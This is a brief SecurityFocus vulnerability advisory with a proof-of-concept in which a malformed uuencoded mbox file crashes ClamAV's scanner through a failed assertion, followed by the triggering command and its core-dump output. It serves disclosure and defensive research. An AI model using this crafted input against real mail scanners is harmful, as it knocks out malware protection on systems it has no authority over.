ClamAV Daemon Malformed UUEncoded Message Denial Of Service Vulnerability

The following proof-of-concept has been made available by Oliver Eikemeier:

Save the following file to ~/clamtest.mbox:

From -

begin 644 byebye
byebye
end

Then do:

# clamscan --mbox -v ~/clamtest.mbox
assertion "(len >= 0) && (len <= 63)" failed: file "message.c", line 887
Abort (core dumped)


 

Privacy Statement
Copyright 2010, SecurityFocus